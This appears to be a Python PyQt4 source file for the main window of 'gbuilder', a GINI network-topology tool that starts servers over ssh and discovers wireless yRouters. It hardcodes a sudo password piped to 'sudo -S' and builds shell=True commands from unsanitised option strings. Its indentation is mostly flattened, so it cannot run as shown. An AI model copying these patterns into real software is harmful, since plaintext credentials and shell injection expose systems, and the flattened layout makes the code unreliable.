self.createConfigWindows()
self.createPopupWindows()
self.createProgressBar()
self.newScene()
self.debugWindow.hide()
self.tm.hide()
self.routes.hide()
self.setVisible(True)
self.center()
self.saveLayout(environ["config"] + "defaultLayout")
self.setStyleSheet("""QToolTip {
background-color: black;
color: white;
border: black solid 1px
}""")
self.defaultLayout = True
if options["restore"]:
self.loadLayout()
self.defaultLayout = False
self.loadProject()
atexit.register(self.cleanup)
def center(self):
"""
Center the window.
"""
screen = QtGui.QDesktopWidget().screenGeometry()
rect = self.geometry()
self.move((screen.width()-rect.width())/2, (screen.height()-rect.height())/2)
self.show()
def getProject(self):
"""
Return the project.
"""
return self.project
def startTutorial(self):
"""
Start the interactive tutorial.
"""
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You are already doing the tutorial! If you would like to stop or restart, select 'Close' from the File menu now.")
return
if not self.closeTopology():
return
self.project = "Tutorial"
self.filename = ""
self.canvas = Tutorial(self)
mainWidgets["canvas"] = self.canvas
self.tabWidget.removeTab(0)
self.tabWidget.addTab(self.canvas, "Tutorial")
self.canvas.start()
for nodeType in nodeTypes.keys():
itemTypes = nodeTypes[nodeType]
itemTypes[nodeType] = 0
self.properties.clear()
self.interfaces.clear()
self.routes.clear()
self.resetLayout(True)
self.lockDocks()
def lockDocks(self):
"""
Lock the dock windows so they cannot be moved, closed or resized.
"""
self.tm.hide()
for dock in self.docks.values():
dock.setFeatures(dock.NoDockWidgetFeatures)
def unlockDocks(self):
"""
Unlock the dock windows.
"""
self.tm.show()
for dock in self.docks.values():
dock.setFeatures(dock.DockWidgetClosable | dock.DockWidgetMovable | dock.DockWidgetFloatable)
def faq(self):
"""
Open the FAQ in the default browser.
"""
olddir = os.getcwd()
os.chdir(environ["doc"])
loadpath = os.getcwd()
os.chdir(olddir)
if environ["os"] == "Windows":
url = QtCore.QUrl("file:///" + loadpath + "/FAQ.html")
else:
url = QtCore.QUrl("file://" + loadpath + "/FAQ.html")
QtGui.QDesktopServices.openUrl(url)
def closeTopology(self,usedyRouters=usedyRouters):
"""
Close the current topology.
"""
if self.running:
self.log.append("You cannot close a topology when one is still running!")
return False
scene = self.canvas.scene()
if scene and scene.items():
reply = QtGui.QMessageBox.warning(self, self.tr(Core.globals.PROG_NAME), self.tr("Save before closing?"), QtGui.QMessageBox.Yes | QtGui.QMessageBox.No | QtGui.QMessageBox.Cancel)
if reply == QtGui.QMessageBox.Yes:
if not self.saveTopology():
return False
elif reply == QtGui.QMessageBox.No:
pass
else:
return False
if isinstance(mainWidgets["canvas"], Tutorial):
self.canvas = Canvas(self)
mainWidgets["canvas"] = self.canvas
self.tabWidget.removeTab(0)
self.tabWidget.addTab(self.canvas, "Default Project")
self.project = ""
self.unlockDocks()
self.filename = ""
scene = Scene(self.canvas)
scene.setItemIndexMethod(QtGui.QGraphicsScene.NoIndex)
self.canvas.setScene(scene)
self.expansions = 0
for nodeType in nodeTypes.keys():
itemTypes = nodeTypes[nodeType]
itemTypes[nodeType] = 0
if usedyRouters:
for yunid, yun in usedyRouters.iteritems():
availableyRouters.append(yun)
availableyRouters.sort(key=lambda YunEntity: YunEntity['ID'])
usedyRouters = {}
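# NOTE: this rebinds only the local name; the module-level usedyRouters
# dict is left untouched by this assignment.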
self.properties.clear()
self.interfaces.clear()
self.routes.clear()
return True
def sendFile(self):
"""
Start a process to select and send a file to the server.
"""
if not self.server or self.server.poll() != None:
self.log.append("Please start the server first!")
return
if not self.client or not self.client.isConnected():
self.startClient()
filename = self.loadFile("All Files (*.*)")
if not filename:
return
self.sendWindow.setFilename(filename)
self.sendWindow.show()
def newScene(self):
"""
Close the current topology and create a new one.
"""
if self.running:
self.log.append("You cannot create a new topology when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot create a new topology during the tutorial!")
return
if not self.closeTopology(usedyRouters):
return
self.expandScene()
def expandScene(self):
"""
Expand the scene based on number of expansions.
"""
x = 175 + self.expansions * 30
y = 160 + self.expansions * 20
scene = self.canvas.scene()
item = QtGui.QGraphicsLineItem(-x, -y, x, y)
scene.addItem(item)
scene.removeItem(item)
self.expansions += 1
def newProject(self):
"""
Create a new project for device sharing.
"""
if self.running:
self.log.append("You cannot create a new project when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot create a new project during the tutorial!")
return
filename = self.saveFile("gproj")
if filename.isEmpty():
return
projectname = str(filename).split("/")[-1].rsplit(".gproj", 1)[0]  # strip() removes characters, not a suffix
from Core.Item import nodeTypes
for nodeType in nodeTypes:
if projectname.startswith(nodeType + "_"):
self.popup.setWindowTitle("Invalid Project Name")
self.popup.setText("You cannot name a project starting with the name of a device and underscore!")
self.popup.show()
return
self.project = str(filename)
file = QtCore.QFile(filename)
if not file.open(QtCore.QFile.WriteOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Save Error"),
self.tr("Cannot write file %1:\n%2.")
.arg(self.filename)
.arg(file.errorString()))
return
out = QtCore.QTextStream(file)
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
if options["username"]:
out << "username=" + options["username"] + "\n"
else:
self.log.append("Warning, no username is specified!")
if options["session"]:
out << "session=" + options["session"] + "\n"
elif options["server"]:
out << "server=" + options["server"] + "\n"
else:
self.log.append("Warning, no server or session name is specified!")
QtGui.QApplication.restoreOverrideCursor()
self.tabWidget.addTab(self.canvas, projectname)
def openProject(self):
"""
Load an existing project for device sharing.
"""
if self.running:
self.log.append("You cannot open a project when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot open a project during the tutorial!")
return
filename = self.loadFile("GPROJ (*.gproj)")
if filename.isEmpty():
return
self.project = str(filename)
self.loadProject()
def loadProject(self):
"""
Load project file data into options.
"""
if not self.project:
self.tabWidget.addTab(self.canvas, "Default Project")
return
file = QtCore.QFile(self.project)
if not file.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Load Error"),
self.tr("Cannot read file %1:\n%2.")
.arg(self.project)
.arg(file.errorString()))
self.tabWidget.addTab(self.canvas, "Default Project")
return
_in = QtCore.QTextStream(file)
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
while not _in.atEnd():
line = str(_in.readLine())
option, value = line.split("=", 1)
options[option] = value
self.configWindow.updateSettings()
QtGui.QApplication.restoreOverrideCursor()
projectname = self.project.split("/")[-1].rsplit(".gproj", 1)[0]
self.tabWidget.addTab(self.canvas, projectname)
def closeProject(self):
"""
Close the current project.
"""
if self.running:
self.log.append("You cannot close a project when it is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot close a project during the tutorial!")
return
if self.tabWidget.count() == 1:
self.tabWidget.addTab(self.canvas, "Default Project")
self.project = ""
else:
self.tabWidget.removeTab(0)
def export(self):
"""
Open an export window to generate an image from the canvas.
"""
self.exportWindow.show()
def startBackend(self):
"""
Start the backend server.
"""
self.startServer()
#self.startClient()
def setRecovery(self, recovery):
"""
Set the recovering state of the topology.
"""
self.recovery = recovery
def isRunning(self):
"""
Returns whether a topology is running or not.
"""
return self.running
def startWServer(self):
"""
Call the startwgini_server function
"""
self.startwgini_server()
#thread.join()
def startServer(self):
"""
Start the server backend of gbuilder, which controls running topologies.
"""
if self.server and self.server.poll() == None:
self.log.append("A server is already running!")
return
base = "ssh -t " + options["username"] + "@" + options["server"]
tunnel = " -L " + options["localPort"] + ":localhost:" + options["remotePort"]
server = "bash -c -i 'gserver " + options["remotePort"] + "' || sleep 5"
command = ""
gserver = "gserver"
if environ["os"] == "Windows":
startpath = environ["tmp"] + "gserver.start"
try:
startFile = open(startpath, "w")
startFile.write("echo -ne \"\\033]0;" + gserver + "\\007\"\n")
startFile.write(server)
startFile.close()
except:
self.log.append("Failed to write to start file!")
return
command += "putty -"
if options["session"]:
command += "load " + options["session"] + " -l " + options["username"] + " -t"
else:
command += base
command += tunnel + " -m \"" + startpath + "\""
else:
command += "rxvt -T \"" + gserver + "\" -e " + base + tunnel + " \" " + server + "\""
self.server = subprocess.Popen(str(command), shell=True,preexec_fn=os.setpgrp)
def startwgini_server(self):
"""
Start the wireless GINI server
"""
base = "ssh -t " + options["username"] + "@" + options["wserver"]
tunnel = " -L " + options["wlocalPort"] + ":localhost:" + options["wremotePort"]
server = "bash -c -i 'ServerAPI'"
command = ""
gserver = "WGINI Server"
command += "rxvt -T \"" + gserver + "\" -e " + base + tunnel + " \" " + server + "\""
sudoPassword = 'livelifeking123'
command1 = 'route add -net 192.168.0.0 gw 192.168.54.24 netmask 255.255.255.0 eth1' #change accordingly!
p = os.system('echo %s|sudo -S %s' % (sudoPassword, command1))
self.wgini_server = subprocess.Popen(str(command), shell=True,preexec_fn=os.setpgrp)
def startClient(self):
"""
Start the client of gbuilder, which communicates with the server.
"""
self.client = Client(self)
self.client.connectTo("localhost", int(options["localPort"]), 10)
#self.client.start()
mainWidgets["client"] = self.client
def compile(self):
"""
Compile the current topology.
"""
if self.running:
self.log.append("You cannot compile a topology when one is still running!")
return False
if self.saveTopology() == False:
return False
scene = self.canvas.scene()
compiler = Compiler(scene.items(), self.filename)
xmlFile = compiler.compile()
self.properties.display()
self.interfaces.display()
self.routes.display()
if xmlFile:
self.statusBar().showMessage(self.tr("Compiled '%1'").arg(xmlFile), 2000)
return True
else:
self.statusBar().showMessage(self.tr("Compile failed"), 2000)
return False
def run(self):
"""
Run the current topology.
"""
if not self.server or self.server.poll() != None:
self.log.append("Please start the server first!")
return
if not self.client or not self.client.isConnected():
self.startClient()
if self.isRunning() and not self.recovery:
self.log.append("A topology is already running, please stop it first!")
return
scene = self.canvas.scene()
items = scene.items()
if items:
if self.recovery:
self.recovery = False
elif options["autocompile"] and not self.compile():
return
else:
self.log.append("Please create or load a topology first!")
return
options["elasticMode"] = False
xmlFile = self.filename.replace(".gsav", ".xml")
if not os.access(xmlFile, os.F_OK):
self.log.append("Please compile the topology first!")
return
self.tm.show()
#self.progressBar.setValue(0)
self.client.process("file . " + xmlFile)
self.client.send("init " + self.project.split("/")[-1].strip(".gproj"))
self.client.send("canvas %d,%d" % (scene.width(), scene.height()))
for item in items:
if item.device_type == "Mobile" or item.device_type == "Wireless_access_point":
x = item.pos().x()
y = item.pos().y()
self.client.send("mobile %s %d,%d" % (item.getName(), x, y))
self.client.process("start " + xmlFile)
self.running = True
self.canvas.setAcceptDrops(False)
scene = self.canvas.scene()
scene.startRefresh()
scene.clearSelection()
self.properties.clear()
self.interfaces.clear()
self.routes.clear()
def stop(self):
"""
Stop the current running topology.
"""
if not self.server or self.server.poll() != None:
self.log.append("Please start the server first!")
return
if not self.client or not self.client.isConnected():
self.startClient()
if (self.wgini_client is not None) and usedyRouters:
status = self.wgini_client.Delete()
self.log.append(status)
if self.recovery:
self.recovery = False
scene = self.canvas.scene()
activeDevices = False
from Core.Device import Device
for item in scene.items():
if not isinstance(item, Device):
continue
if item.device_type == "Router":
item.stop()
if item.status:
activeDevices = True
if not activeDevices:
self.stopped()
elif not scene.isRefreshing():
scene.startRefresh()
self.client.process("stop")
def stopped(self):
"""
Handle a fully stopped topology.
"""
self.running = False
self.canvas.scene().stopRefresh()
self.tm.hide()
self.canvas.setAcceptDrops(True)
olddir = os.getcwd()
os.chdir(environ["tmp"])
for tmpfile in os.listdir("."):
if tmpfile.startswith("."):
continue
try:
os.remove(tmpfile)
except:
continue
os.chdir(olddir)
def loadFile(self, filetype):
"""
Load a file through a file dialog.
"""
# Qt is very picky in the filename structure but python is not, so we use python
# to form the correct path which will work for both Windows and Linux
olddir = os.getcwd()
os.chdir(environ["sav"])
loadpath = os.getcwd()
os.chdir(olddir)
filename = QtGui.QFileDialog.getOpenFileName(self,
self.tr("Choose a file name"), loadpath,
self.tr(filetype))
return filename
def loadrealTopologyfile(self, filetype):
"""
Load a real topology name
"""
self.popup.setWindowTitle("Topology Names")
self.popup.setText("You are about to select from the list:\n1.Ernet")
self.popup.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)
self.popup.show()
retval = self.popup.exec_()
if retval==1024:
olddir = os.getcwd()
os.chdir(environ["sav"])
os.chdir("exist")
loadpath = os.getcwd()
os.chdir(olddir)
filename = QtGui.QFileDialog.getOpenFileName(self,
self.tr("Choose a file name"), loadpath,
self.tr(filetype))
return filename
def loadrealTopology(self):
"""
Load a real topology.
"""
if self.running:
self.log.append("You cannot load a topology when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot load a topology during the tutorial!")
return
def loadIntoScene(line, *args):
scene = self.canvas.scene()
itemType,arg = line.split(":")
args = str(arg).strip("()").split(",")
if itemType == "edge":
source = scene.findItem(args[0])
dest = scene.findItem(args[1])
if source.device_type == "Mobile" or dest.device_type == "Mobile":
item = Wireless_Connection(source, dest)
else:
item = Connection(source, dest)
scene.addItem(item)
else:
devType, index = str(itemType).rsplit("_", 1)
item = deviceTypes[devType]()
item.setIndex(int(index))
scene.addItem(item)
item.setPos(float(args[0]), float(args[1]))
item.nudge()
return item
def loadProperties(itemDict):
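            # Property lines are tab-indented; the leading tab count encodes
            # what each line describes:
            #   1 tab  - a property of the item itself
            #   2 tabs - selects the current interface target (a scene item)
            #   3 tabs - a property of the current interface
            #   4 tabs - a route entry for the given subnet
            #   5 tabs - a property of the current route entry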
currentInterfaceTarget = None
currentRouteSubnet = None
for item, properties in itemDict.iteritems():
for line in properties:
count = 0
while line.find("\t") == 0:
line = line[1:]
count += 1
prop, value = line.split(":", 1)
if count == 1:
item.setProperty(prop, value)
elif count == 2:
currentInterfaceTarget = self.canvas.scene().findItem(value)
elif count == 3:
item.setInterfaceProperty(prop, value, currentInterfaceTarget)
elif count == 4:
currentRouteSubnet = value
item.addEntry("", "", value, currentInterfaceTarget)
elif count == 5:
item.setEntryProperty(prop, value, currentRouteSubnet, currentInterfaceTarget)
filename = self.loadrealTopologyfile("GSAV (*.gsav)")
if not filename:
return
file = QtCore.QFile(filename)
if not file.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Load Error"),
self.tr("Cannot read file %1:\n%2.")
.arg(filename)
.arg(file.errorString()))
return
self.newScene()
self.filename = str(filename)
_in = QtCore.QTextStream(file)
yRouters = False
if "yRouter" in str(_in.readAll()):
yRouters = True
QtGui.QMessageBox.warning(self, self.tr("Load Warning"), self.tr("This file contains yRouters, which may not be physically available right now. Any yRouters no longer physically available will automatically be removed from the topology."))
if not self.wgini_server:
if not self.startWGINIClient():
QtGui.QMessageBox.warning(self, self.tr("Load Error"), self.tr("Cannot open file with yRouters without connecting to wireless server."))
return
if yRouters:
self.discover()
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
itemDict = {}
_in.seek(0)
line = str(_in.readLine())
lines = []
while not _in.atEnd():
item=loadIntoScene(line)
line=str(_in.readLine())
while line.find("\t") == 0:
lines.append(line)
line=str(_in.readLine())
itemDict[item] = lines
lines = []
loadProperties(itemDict)
QtGui.QApplication.restoreOverrideCursor()
self.statusBar().showMessage(self.tr("Loaded '%1'").arg(filename), 2000)
def loadTopology(self):
"""
Load a topology.
"""
if self.running:
self.log.append("You cannot load a topology when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot load a topology during the tutorial!")
return
def loadIntoScene(line, *args):
scene = self.canvas.scene()
itemType,arg = line.split(":")
args = str(arg).strip("()").split(",")
if itemType == "edge":
source = scene.findItem(args[0])
dest = scene.findItem(args[1])
if source.device_type == "Mobile" or dest.device_type == "Mobile":
item = Wireless_Connection(source, dest)
else:
item = Connection(source, dest)
scene.addItem(item)
else:
devType, index = str(itemType).rsplit("_", 1)
item = deviceTypes[devType]()
item.setIndex(int(index))
scene.addItem(item)
item.setPos(float(args[0]), float(args[1]))
item.nudge()
return item
def loadProperties(itemDict):
currentInterfaceTarget = None
currentRouteSubnet = None
for item, properties in itemDict.iteritems():
for line in properties:
count = 0
while line.find("\t") == 0:
line = line[1:]
count += 1
prop, value = line.split(":", 1)
if count == 1:
item.setProperty(prop, value)
elif count == 2:
currentInterfaceTarget = self.canvas.scene().findItem(value)
elif count == 3:
item.setInterfaceProperty(prop, value, currentInterfaceTarget)
elif count == 4:
currentRouteSubnet = value
item.addEntry("", "", value, currentInterfaceTarget)
elif count == 5:
item.setEntryProperty(prop, value, currentRouteSubnet, currentInterfaceTarget)
filename = self.loadFile("GSAV (*.gsav)")
if filename.isEmpty():
return
file = QtCore.QFile(filename)
if not file.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Load Error"),
self.tr("Cannot read file %1:\n%2.")
.arg(filename)
.arg(file.errorString()))
return
self.newScene()
self.filename = str(filename)
_in = QtCore.QTextStream(file)
yRouters = False
if "yRouter" in str(_in.readAll()):
yRouters = True
QtGui.QMessageBox.warning(self, self.tr("Load Warning"), self.tr("This file contains yRouters, which may not be physically available right now. Any yRouters no longer physically available will automatically be removed from the topology."))
if not self.wgini_server:
if not self.startWGINIClient():
QtGui.QMessageBox.warning(self, self.tr("Load Error"), self.tr("Cannot open file with yRouters without connecting to wireless server."))
return
if yRouters:
self.discover()
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
itemDict = {}
_in.seek(0)
line = str(_in.readLine())
lines = []
while not _in.atEnd():
item=loadIntoScene(line)
line=str(_in.readLine())
while line.find("\t") == 0:
lines.append(line)
line=str(_in.readLine())
itemDict[item] = lines
lines = []
loadProperties(itemDict)
QtGui.QApplication.restoreOverrideCursor()
self.statusBar().showMessage(self.tr("Loaded '%1'").arg(filename), 2000)
def saveFile(self, filetype):
"""
Save a file through a file dialog.
"""
olddir = os.getcwd()
os.chdir(environ["sav"])
savepath = os.getcwd()
os.chdir(olddir)
filename = QtGui.QFileDialog.getSaveFileName(self,
self.tr("Choose a file name"), savepath,
self.tr(filetype.upper() + " (*.%s)" % filetype))
if filename.isEmpty():
return filename
if not filename.toLower().endsWith("." + filetype):
filename += "." + filetype
return filename
def saveTopologyAs(self):
"""
Save a topology under a given filename.
"""
if not self.canvas.scene().items():
self.log.append("There is nothing to save!")
return False
filename = self.saveFile("gsav")
if filename.isEmpty():
return False
self.filename = str(filename)
return self.saveTopology()
def saveTopology(self):
"""
Save a topology.
"""
scene=self.canvas.scene()
if not scene.items():
self.log.append("There is nothing to save!")
return False
        # no filename chosen yet (first save): prompt for one
if not self.filename:
return self.saveTopologyAs()
if usedyRouters:
self.popup.setWindowTitle("Save Warning")
self.popup.setText("This topology contains yRouters, which may not be available when loading the project later.")
self.popup.show()
file = QtCore.QFile(self.filename)
if not file.open(QtCore.QFile.WriteOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Save Error"),
self.tr("Cannot write file %1:\n%2.")
.arg(self.filename)
.arg(file.errorString()))
return False
out = QtCore.QTextStream(file)
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
outstring = ""
for item in scene.items():
if isinstance(item, Node):
outstring += item.toString()
for item in scene.items():
if isinstance(item, Edge):
outstring += item.toString()
out << outstring
QtGui.QApplication.restoreOverrideCursor()
self.statusBar().showMessage(self.tr("Saved '%1'").arg(self.filename), 2000)
return True
def copy(self):
"""
Copy selected text from the log into the paste buffer.
"""
self.log.copy()
def config(self):
"""
Open the options window.
"""
self.configWindow.show()
def startWGINIClient(self):
"""
Start wireless GINI client
"""
ok=None
if not self.server or self.server.poll() is not None:
self.log.append("You must start the main server before you can start the wireless client!")
elif not self.wgini_server or self.wgini_server.poll() is not None:
self.popup.setWindowTitle("Start server")
self.popup.setText("You must start the WGINI server first! Please start it from the system tray above canvas.")
self.popup.show()
elif self.wgini_client is not None:
self.log.append("Wireless GINI client is already running!")
else:
windowTitle = "Client data"
labelText = "Enter wireless client IP:"
text, ok = self.inputDialog.getText(self.inputDialog, windowTitle, labelText)
if ok:
if not text:
self.log.append("Nothing entered; starting wireless GINI client cancelled!")
return False
else:
ipportip=text
                try:
                    socket.inet_aton(str(ipportip))
                except socket.error:
                    self.log.append("Invalid entry, starting wireless GINI client cancelled.")
                    return False
                self.wserverIP = self.get_ip_address('eth1')
self.wserverPort = '60000'
wclientIP = str(ipportip)
try:
self.wgini_client= WGINI_Client(self.wserverIP,self.wserverPort,wclientIP)
mainWidgets["wgini_client"]=self.wgini_client
self.log.append("Wireless GINI client connected at %s" %(ipportip[0]))
return True
except:
self.log.append("Starting wireless GINI client failed.")
return False
else:
return False
    @staticmethod
    def get_ip_address(ifname):
        # look up the IPv4 address bound to a network interface (Linux-only,
        # via the SIOCGIFADDR ioctl); local imports in case the module
        # header does not already pull these in
        import fcntl
        import struct
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        return socket.inet_ntoa(fcntl.ioctl(
            s.fileno(),
            0x8915,  # SIOCGIFADDR
            struct.pack('256s', ifname[:15])
        )[20:24])
def discover(self):
"""
Add yRouters within range of topology
"""
if self.wgini_client is None:
self.log.append("You must connect to the wireless server before you can discover any new devices!")
if not self.startWGINIClient():
return
if self.isRunning() and not self.recovery:
self.log.append("A topology is currently running, please stop it before discovering any new devices!")
return
if isinstance(mainWidgets["canvas"],Tutorial):
self.log.append("You cannot discover any new devices during this tutorial!")
return
if not self.client or not self.client.isConnected():
self.startClient()
self.popup.setWindowTitle("yRouter discovery")
tempList=self.wgini_client.Check()
scene=self.canvas.scene()
removed = 0
        for yid, yun in usedyRouters.items():  # items() copies, safe while deleting below
if (yun not in tempList) or (yun in tempList and ((yun['MaxWlan'] - yun['CurrWlan']) == 0)):
self.popup.setText("yRouter_%d is no longer available. It will be removed from the topology." %yid)
self.popup.show()
                yRouter = scene.findItem("yRouter_%d" % yid)
yRouter.delete()
del usedyRouters[yid]
removed += 1
found=0
updated=0
for yun in tempList:
            openYun = yun['MaxWlan'] - yun['CurrWlan']  # free wireless slots
            if openYun == 0:
if yun['ID'] in usedyRouters.keys():
self.popup.setText("yRouter_%d is no longer available. It will be removed from the topology." %yun['ID'])
self.popup.show()
                    yRouter = scene.findItem("yRouter_%d" % yun['ID'])
yRouter.delete()
del usedyRouters[yun['ID']]
removed += 1
else:
continue
elif (yun['ID'] not in yRouters.keys()):
yRouters[yun['ID']] = yun
availableyRouters.append(yun)
found += 1
else:
if not yRouters[yun['ID']] == yun:
yRouters[yun['ID']] = yun
                    yRouter = next(y for y in availableyRouters if y['ID'] == yun['ID'])
availableyRouters.remove(yRouter)
availableyRouters.append(yun)
updated +=1
availableyRouters.sort(key=lambda YunEntity: YunEntity['ID'])
if found == 0 and updated == 0 and removed == 0:
text = "No yRouters found, updated, or removed."
else:
if found == 0:
text = "No yRouters found, "
else:
text = "%d yRouters found, " %found
if updated == 0:
text += "no yRouters updated, "
else:
text += "%d yRouters updated, " %updated
if removed == 0:
text += "no yRouters removed."
else:
text += "%d yRouters removed." %removed
if mainWidgets["drop"].commonDropArea.yRouterDrop is not None:
mainWidgets["drop"].commonDropArea.yRouterDrop.update()
if mainWidgets["drop"].netDropArea.yRouterDrop is not None:
mainWidgets["drop"].netDropArea.yRouterDrop.update()
self.log.append(text)
def arrange(self):
"""
Rearrange the topology based on the distance between nodes.
"""
if self.isRunning():
self.log.append("Cannot arrange while running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
mainWidgets["log"].append("Cannot arrange during the tutorial!")
return
options["elasticMode"] = not options["elasticMode"]
def about(self):
"""
Show the about window.
"""
QtGui.QMessageBox.about(self,
self.tr("About %s %s"
% (Core.globals.PROG_NAME,
Core.globals.PROG_VERSION)),
self.tr("<b>%s %s</b><br>Written by Daniel Ng<br>under the supervision of Muthucumaru Maheswaran"
% (Core.globals.PROG_NAME,
Core.globals.PROG_VERSION)))
def createActions(self):
"""
Create the actions used in the menus and toolbars.
"""
self.newSceneAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "new.png"), self.tr("&New"), self)
self.newSceneAct.setShortcut(self.tr("Ctrl+N"))
self.newSceneAct.setStatusTip(self.tr("Create a new topology"))
self.connect(self.newSceneAct, QtCore.SIGNAL("triggered()"), self.newScene)
self.closeAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "close.png"), self.tr("&Close"), self)
self.closeAct.setShortcut(self.tr("Ctrl+W"))
self.closeAct.setStatusTip(self.tr("Close the current topology"))
self.connect(self.closeAct, QtCore.SIGNAL("triggered()"), self.closeTopology)
self.loadAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "open.png"), self.tr("&Open..."), self)
self.loadAct.setShortcut(self.tr("Ctrl+O"))
self.loadAct.setStatusTip(self.tr("Load a topology"))
self.connect(self.loadAct, QtCore.SIGNAL("triggered()"), self.loadTopology)
self.saveAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "save.png"), self.tr("&Save..."), self)
self.saveAct.setShortcut(self.tr("Ctrl+S"))
self.saveAct.setStatusTip(self.tr("Save the current topology"))
self.connect(self.saveAct, QtCore.SIGNAL("triggered()"), self.saveTopology)
self.saveAsAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "save.png"), self.tr("&Save As..."), self)
self.saveAsAct.setShortcut(self.tr("Ctrl+Shift+S"))
self.saveAsAct.setStatusTip(self.tr("Save the current topology under a given filename"))
self.connect(self.saveAsAct, QtCore.SIGNAL("triggered()"), self.saveTopologyAs)
self.sendFileAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "send.png"), self.tr("&Send File..."), self)
self.sendFileAct.setShortcut(self.tr("Ctrl+F"))
self.sendFileAct.setStatusTip(self.tr("Choose a file to send to the server"))
self.connect(self.sendFileAct, QtCore.SIGNAL("triggered()"), self.sendFile)
self.exportAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "export.png"), self.tr("&Export..."), self)
self.exportAct.setShortcut(self.tr("Ctrl+P"))
self.exportAct.setStatusTip(self.tr("Export the current topology as an image"))
self.connect(self.exportAct, QtCore.SIGNAL("triggered()"), self.export)
self.copyAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "copy.png"), self.tr("&Copy"), self)
self.copyAct.setShortcut(self.tr("Ctrl+C"))
self.copyAct.setStatusTip(self.tr("Copy the selected text"))
self.connect(self.copyAct, QtCore.SIGNAL("triggered()"), self.copy)
self.startWGINIClientAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "startClient.png"), self.tr("&Start WGINI Client"), self)
self.startWGINIClientAct.setShortcut(self.tr("Ctrl+W"))
self.startWGINIClientAct.setStatusTip(self.tr("Start wireless GINI client"))
self.connect(self.startWGINIClientAct, QtCore.SIGNAL("triggered()"), self.startWGINIClient)
self.discoverAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "discover.png"), self.tr("&Discover"), self)
self.discoverAct.setShortcut(self.tr("Ctrl+Shift+Y"))
self.discoverAct.setStatusTip(self.tr("Discover nearby yRouters"))
self.connect(self.discoverAct, QtCore.SIGNAL("triggered()"), self.discover)
self.compileAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "compile.png"), self.tr("&Compile"), self)
self.compileAct.setShortcut(self.tr("Ctrl+E"))
self.compileAct.setStatusTip(self.tr("Compile the current topology"))
self.connect(self.compileAct, QtCore.SIGNAL("triggered()"), self.compile)
self.runAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "run.png"), self.tr("&Run"), self)
self.runAct.setShortcut(self.tr("Ctrl+R"))
self.runAct.setStatusTip(self.tr("Run the current topology"))
self.connect(self.runAct, QtCore.SIGNAL("triggered()"), self.run)
self.stopAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "stop.png"), self.tr("&Stop"), self)
self.stopAct.setShortcut(self.tr("Ctrl+D"))
self.stopAct.setStatusTip(self.tr("Stop the current topology"))
self.connect(self.stopAct, QtCore.SIGNAL("triggered()"), self.stop)
self.startServerAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "startServer.png"), self.tr("&Start Server"), self)
self.startServerAct.setShortcut(self.tr("Ctrl+T"))
self.startServerAct.setStatusTip(self.tr("Start the server"))
self.connect(self.startServerAct, QtCore.SIGNAL("triggered()"), self.startBackend)
self.startwServerAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "startServer.png"), self.tr("&Start WGINI Server"), self)
self.startwServerAct.setShortcut(self.tr("Ctrl+W"))
self.startwServerAct.setStatusTip(self.tr("Start the WGINI server"))
self.connect(self.startwServerAct, QtCore.SIGNAL("triggered()"), self.startWServer)
self.optionsAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "options.png"), self.tr("&Options"), self)
self.optionsAct.setShortcut(self.tr("F2"))
self.optionsAct.setStatusTip(self.tr("Show the options window"))
self.connect(self.optionsAct, QtCore.SIGNAL("triggered()"), self.config)
self.arrangeAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "arrange.png"), self.tr("&Arrange"), self)
self.arrangeAct.setShortcut(self.tr("Ctrl+A"))
self.arrangeAct.setStatusTip(self.tr("Arranges the current topology"))
self.connect(self.arrangeAct, QtCore.SIGNAL("triggered()"), self.arrange)
self.resetLayoutAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "layout.png"), self.tr("Reset Layout"), self)
self.resetLayoutAct.setStatusTip(self.tr("Reset dock windows to the saved layout"))
self.connect(self.resetLayoutAct, QtCore.SIGNAL("triggered()"), self.resetLayout)
self.expandSceneAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "expand.png"), self.tr("Expand Scene"), self)
self.expandSceneAct.setStatusTip(self.tr("Expand the scene for more space"))
self.connect(self.expandSceneAct, QtCore.SIGNAL("triggered()"), self.expandScene)
self.quitAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "exit.png"), self.tr("&Quit"), self)
self.quitAct.setShortcut(self.tr("Ctrl+Q"))
